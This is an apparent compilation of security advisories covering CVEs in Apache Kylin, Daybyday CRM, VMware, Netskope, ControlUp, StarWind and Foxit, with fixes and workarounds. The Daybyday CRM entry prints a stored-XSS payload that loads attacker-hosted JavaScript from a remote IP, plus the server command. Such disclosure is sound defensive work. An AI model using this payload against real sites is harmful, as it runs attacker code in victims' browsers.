Apache kylin checks the legitimacy of the project before executing some commands with the project name passed in by the user. There is a mismatch between what is being checked and what is being used as the shell command argument in DiagnosisService. This may cause an illegal project name to pass the check and perform the following steps, resulting in a command injection vulnerability. This issue affects Apache Kylin 4.0.0.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2021-45456

In Daybyday CRM, version 2.2.0 is vulnerable to Stored Cross-Site Scripting (XSS) vulnerability that allows low privileged application users to store malicious scripts in the title field of new tasks. These scripts are executed in a victimâ€™s browser when they open the â€œ/tasksâ€? page to view all the tasks.

**Overview**

In Daybyday CRM, version 2.2.0 is vulnerable to Stored Cross-Site Scripting (XSS) vulnerability that allows low privileged application users to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks” page to view all the tasks.

**Details**

Daybyday CRM is affected by a stored XSS vulnerability that allows low privileged application users (having permission to create tasks) to store malicious scripts in the title field of new tasks. These scripts are executed in a victim’s browser when they open the “/tasks” page to view all the tasks.

**PoC Details**

For demonstration purposes we\\'ll use 2 users:  
test@user.com (low privileged user)  
admin@admin.com (administrator)  
Login to the application as test@user.com, which has a role Employee and has permissions to create tasks.  
Go to “New Task” from the left pane and create a new task. Inject the below payload in the Title field and click on Create Task button. The payload includes the attacker\\'s remote machine from which they load javascript malicious code.  
On the attacker’s machine, create a file called “test.js” with contents as given below.  
Run a PHP server to host the “test.js” file.  
Login as admin@admin.com and go to All Tasks from the left pane, and will notice that an alert pops up with content hosted on the PHP server.  
Login with test@user.com. Add “/users/calendar-users” to the url, and the absences for all the users will be available in the returned JSON data.

**PoC Code**

    // Payload
    "></a><script type="text/javascript" src="http://192.168.18.40:9999/test.js"></script>
    // “test.js” contents:
    alert(“This proves my POC works :)”);
    // Command to run the PHP server
    php -S 192.168.18.40:9999

**Affected Environments**

bottelet/flarepoint - 2.2.0

**Prevention**

Update to 2.2.1 in "bottelet/flarepoint" package, 2.2.1 in "Bottelet/DaybydayCRM" repo.

CVE-2022-22109: WhiteSource Vulnerability Database

VMware ESXi (7.0, 6.7 before ESXi670-202111101-SG and 6.5 before ESXi650-202110101-SG), VMware Workstation (16.2.0) and VMware Fusion (12.2.0) contains a heap-overflow vulnerability in CD-ROM device emulation. A malicious actor with access to a virtual machine with CD-ROM device emulation may be able to exploit this vulnerability in conjunction with other issues to execute code on the hypervisor from a virtual machine.

Advisory ID: VMSA-2022-0001

CVSSv3 Range: 7.7

Issue Date: 2022-01-04

Updated On: 2022-01-04 (Initial Advisory)

CVE(s): CVE-2021-22045

Synopsis: VMware Workstation, Fusion and ESXi updates address a heap-overflow vulnerability (CVE-2021-22045)

Share this page on social media

Sign up for Security Advisories

****1\. Impacted Products****

*   VMware ESXi
*   VMware Workstation
*   VMware Fusion
*   VMware Cloud Foundation

****2\. Introduction****

A heap-overflow vulnerability in VMware Workstation, Fusion and ESXi was privately reported to VMware. Updates are available to remediate this vulnerability in affected VMware products.

****3\. VMware Workstation, Fusion and ESXi updates address a heap-overflow vulnerability (CVE-2021-22045)****

The CD-ROM device emulation in VMware Workstation, Fusion and ESXi has a heap-overflow vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.7.

A malicious actor with access to a virtual machine with CD-ROM device emulation may be able to exploit this vulnerability in conjunction with other issues to execute code on the hypervisor from a virtual machine.

To remediate CVE-2021-22045 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

Workarounds for CVE-2021-22045 have been listed in the 'Workarounds' column of the 'Response Matrix' below.

Successful exploitation requires CD image to be attached to the virtual machine.

VMware would like to thank Jaanus K\\xc3\\xa4\\xc3\\xa4p, Clarified Security working with Trend Micro Zero Day Initiative for reporting this vulnerability to us.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

ESXi

7.0

Any

CVE-2021-22045

7.7

important

Patch Pending

KB87249

None

ESXi

6.7

Any

CVE-2021-22045

7.7

important

ESXi670-202111101-SG

KB87249

None

ESXi

6.5

Any

CVE-2021-22045

7.7

important

ESXi650-202110101-SG

KB87249

None

Workstation

16.x

Any

CVE-2021-22045

7.7

important

16.2.0

KB87206

None

Fusion

12.x

OS X

CVE-2021-22045

7.7

important

12.2.0

KB87207

None

**Impacted Product Suites that Deploy Response Matrix Components:**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

VMware Cloud Foundation (ESXi)

4.x

Any

CVE-2021-22045

7.7

important

Patch Pending

KB87249

None

VMware Cloud Foundation (ESXi)

3.x

Any

CVE-2021-22045

7.7

important

Patch Pending

KB87249

None

****4\. References****

****5\. Change Log****

2022-01-04 VMSA-2022-0001  
Initial security advisory.

****6\. Contact****

CVE-2021-22045: VMSA-2022-0001

Netskope client prior to 89.x on macOS is impacted by a local privilege escalation vulnerability. The XPC implementation of nsAuxiliarySvc process does not perform validation on new connections before accepting the connection. Thus any low privileged user can connect and call external methods defined in XPC service as root, elevating their privilege to the highest level.

**Security Advisory ID:** NSKPSA-2021-002

**Version:** 1.0

**Status:** Published

**Last Modified:** December 20, 2021

**Who should read this document**

Technical and Security Personnel

**Impact of Vulnerability**

Privilege Escalation

**CVE Number**

CVE-2021-41388

**Severity Rating**

High

**Overall CVSS Score**

CVSS:3.1- 7.0 AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

**Recommendations**

Install or update to the latest version released r89.x & above

**Security Advisory Replacement**

None

**Caveats**

None

**Affected Software**

Netskope Client on macOS v88 and earlier

**Updated Software Version**

Netskope Release 89 and later

**Special Notes and Acknowledgements**

Netskope would like to thank Red Team DART from The Home Depot for reporting the issue.  

**CWE Reference**

CWE - CWE-269: Improper Privilege Management (4.5)  
CWE - CWE-250: Execution with Unnecessary Privileges (4.5)

**Exploit Code Maturity (E)**

Proof-of-Concept (P)

**Remediation Level (RL)**

Official Fix (O)

**Report Confidence (RC)**

Confirmed (C)

**Description**  
Netskope client prior to 89.x on macOS is impacted by a local privilege escalation vulnerability. The XPC implementation of nsAuxiliarySvc process does not perform validation on new connections before accepting the connection. Thus any low privileged user can connect and call external methods defined in XPC service as root, elevating their privilege to the highest level.

Affected Components: Netskope Client v88.x and earlier on macOS.

**Remediation**  
Netskope has patched the issue and released a new version of Netskope client.  
Customers are advised to upgrade the software to the latest version (89 or above).  
Netskope macOS NSclient download Instructions can be found at Download Netskope Client and Scripts section – Netskope Support.

**Workaround**  
No work around exists to mitigate the issue apart from upgrading to the latest version.

**Special Notes and Acknowledgement**  
Netskope would like to thank Red Team DART from The Home Depot for reporting this vulnerability.

**Support**  
Netskope Support Details.

**FAQs**

**Do we use this for communication when a customer is abusing our systems?**  
No, please reach out to \[email protected\] for support on this.

**What is affected by this security vulnerability?**  
Netskope Client v88.x and earlier on macOS.

**Do I need to Update Immediately?**  
Netskope recommends that all customers run the latest version of software and evaluate this notification with other existing controls to make a determination. Netskope also recommends that customers leverage the CVSS v3.1 extended scoring or OWASP vulnerability criticality scoring tools to support his decision.

**Affected Versions**  
88.x and earlier.

**Protected Versions**  
89.x and later. Netskope recommends that all customers verify that they have applied the latest updates.

**What issues do this release/patch address?**  
Please review the detailed changelog of the release.

**How do I know if my Netskope Client on macOS is vulnerable or not?**  
To check the Netskope Client version on macOS, navigate to Netskope Client and then Right Click to see the option list. From the list select ‘About’, a pop up screen will display the used version.

**What has Netskope done to resolve the issue?**  
Netskope has released a new version of the software to address this security flaw.

**Where do I download the fix?**  
Please visit the release notes at https://support.netskope.com.

**How does Netskope respond to this and any other security flaws**  
Netskope has a robust Cybersecurity program to address all security flaws in its products reported by external entities and found by internal assessment. The details of Netskope security program is listed at Security, Compliance and Assurance page.

**How do I find out about security vulnerabilities with your products?**  
Please visit Security Advisories and Disclosures page.

**How was this found?**  
This issue was reported by Red Team DART from The Home Depot.

**Resources:**  
Support Website: https://www.netskope.com/services#support

Contacts: \[email protected\], \[email protected\]

CVE-2021-41388: NSKPSA-2021-002

An unauthenticated Named Pipe channel in Controlup Real-Time Agent (cuAgent.exe) before 8.5 potentially allows an attacker to run OS commands via the ProcessActionRequest WCF method.

**Vulnerability ID:** CVE-2021-45912  
**Severity:** High  
**Update Release Date:** June 29, 2021  
**Fix version:** Version >= 8.5.0 for both Hybrid Cloud and COP (On-Premises)

**What was the problem?**

A Named Pipe interface within ControlUp Real-Time Agent’s process provided the ability to run actions (OS commands) without authentication. This vulnerability can be exploited locally only.

**Solution**

We strongly urge you to do the following as soon as possible:

*   Upgrade to the latest version of ControlUp (8.5.1 for Hybrid Cloud/8.5 for On-Premises).
*   Deploy the latest ControlUp Real-Time Agent to all endpoints.

It is important to update/uninstall all ControlUp Real-Time Agents even if they are no longer in use. ControlUp Real-Time Agents of versions lower than 8.5 can put your organization at risk even if there is no ControlUp Console/Monitor connected to them. You can watch this 2-minute video to learn how to easily find machines with older ControlUp Real-Time Agent versions.

Upgrade Guides:  
Upgrade Guide for Hybrid Cloud 8.x to 8.5  
On-Premises Upgrade Guide 8.x to 8.5  
Please read more about the new features and security enhancements in our Security Best Practices Guide.

We use cookies to ensure that we give you the best experience on our website. by continuing to use this site you agree to our Cookie policy. Got it

CVE-2021-45912: Security Advisory – Local Privilege Escalation

StarWind SAN & NAS build 1578 and StarWind Command Center Build 6864 Update Manager allows authentication with JTW token which is signed with any key. An attacker could use self-signed JTW token to bypass authentication resulting in escalation of privileges.

****Summary****

Update Manager allows authentification with JTW token which is signed with any key.

**Impact** 

An attacker could use self-signed JTW token to bypass authentication resulting in escalation of privileges.

****Vulnerability Scoring****

CVE

CVSS 2.0 Score

CVSS 3.x Score

–

1.7 (LOW)

3.2 (LOW)

**CVSS v2 Vector** (AV:L/AC:L/Au:S/C:N/I:P/A:N)

**CVSS v3.1** /AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N/E:P/RC:C/CR:L/IR:L/AR:M/MAV:L/MAC:L/MPR:L/MUI:R/MS:U/MC:N/MI:N/MA:L

****Affected Products:** **

StarWind SAN&NAS build 1578

StarWind Command Center build 6864

****Not affected products:****

StarWind SAN&NAS build 1381

StarWind SAN&NAS build 1064

StarWind Command Center build 5871

StarWind Command Center build 5856

StarWind Command Center build 5650

StarWind Command Center build 4992

StarWind VSAN for Hyper-V (all versions)

StarWind VTL component (all versions for Windows Server)

StarWind V2V (all versions)

StarWind Tape Redirector component (all versions)

StarWind Deduplication Analyzer (all versions)

StarWind rPerf (all versions)

StarWind iSCSI Accelerator (all versions)

StarWind NVMe-oF Initiator (all versions)

****Software Versions and Fixes****

None. This section will be updated as patches are released.

****Workaround****

None.

****Obtaining Software Fixes** **

Software updates will be available in StarWind release notes – https://www.starwindsoftware.com/release-notes-build. To update the software, perform the steps described at the following link  – https://knowledgebase.starwindsoftware.com/guidance/upgrading-from-any-starwind-version-to-any-starwind-version/ or contact support to perform an update. You can submit a support request using the following link https://www.starwindsoftware.com/support-form or contact Support directly via email support@starwind.com or via phone +1 617 829 4499.

****Status of Notice****

**Interim**

StarWind will continue to update information regarding this vulnerability as new details become available.

This vulnerability article should be considered as the single source of current, up-to-date, authorized and accurate information posted by StarWind Software.

**Revision History** 

Revision #

Date

Comments

1.0

2021-12-15

Initial Public Release

CVE-2021-45389: Update Manager vulnerability in StarWind products

Foxit PDF Reader and PDF Editor before 11.1 on macOS allow remote attackers to execute arbitrary code via getURL in the JavaScript API.

CVE-2021-45980: Security Bulletins | Foxit Software

Foxit PDF Reader and PDF Editor before 11.1 on macOS allow remote attackers to execute arbitrary code via xfa.host.gotoURL in the XFA API.

**Foxit PDF Reader XFA API xfa.host.gotoURL Command Injection Vulnerability (Remote Code Execution)**

Product : Foxit PDF Reader macOS 11.0.1.0719

HOST OS : Windows 10 x64 (10.0.19041)

CVSS : 7.8 High (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

Reference : Foxit Security Bulletins

**Credit Information**

*   DoHyun Lee(@l33d0hyun)

CVE-2021-45978: CVE/CVE-2021-45978 at master · dlehgus1023/CVE

Foxit PDF Reader and PDF Editor before 11.1 on macOS allow remote attackers to execute arbitrary code via app.launchURL in the JavaScript API.

**Foxit PDF Reader JavaScript API app.launchURL Command Injection Vulnerability (Remote Code Execution)**

Product : Foxit PDF Reader macOS 11.0.1.0719

HOST OS : Windows 10 x64 (10.0.19041)

CVSS : 7.8 High (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

Reference : Foxit Security Bulletins

**Credit Information**

*   DoHyun Lee(@l33d0hyun)

CVE-2021-45979: CVE/CVE-2021-45979 at master · dlehgus1023/CVE

A hardcoded key in ControlUp Real-Time Agent (cuAgent.exe) before 8.2.5 may allow a potential attacker to run OS commands via a WCF channel.

**Vulnerability ID:** CVE-2021-45913  
**Severity:** High  
**Update Release Date:** April 22, 2021  
**Fix version:** Version >= 8.2.5 for both Hybrid Cloud and COP (On-Premises)

**What was the problem?**

The authentication process between ControlUp Real-Time Console/Monitor and ControlUp Real-Time Agents was based on hardcoded keys. This key could have been extracted from a ControlUp Real-Time Console/Monitor binary file and a potential attacker might use it to craft a fake ControlUp Real-Time Console/Monitor that would be able to successfully authenticate to ControlUp Real-Time Agents and run malicious actions (OS commands) with SYSTEM level privilege on a machine with the ControlUp Real-Time Agent installed.

**Solution**

We strongly urge you to do the following as soon as possible:

*   Upgrade to the latest version of ControlUp (8.5.1 for Hybrid Cloud/8.5 for On-Premises).
*   Deploy the latest ControlUp Real-Time Agent to all endpoints.

It is important to update/uninstall all ControlUp Real-Time Agents even if they are no longer in use. ControlUp Real-Time Agents of versions lower than 8.5 can put your organization at risk even if there is no ControlUp Console/Monitor connected to them. You can watch this 2-minute video to learn how to easily find machines with older ControlUp Real-Time Agent versions.

Upgrade Guides:  
Upgrade Guide for Hybrid Cloud 8.x to 8.5  
On-Premises Upgrade Guide 8.x to 8.5  
Please read more about the new features and security enhancements in our Security Best Practices Guide.

We use cookies to ensure that we give you the best experience on our website. by continuing to use this site you agree to our Cookie policy. Got it

Tag

#mac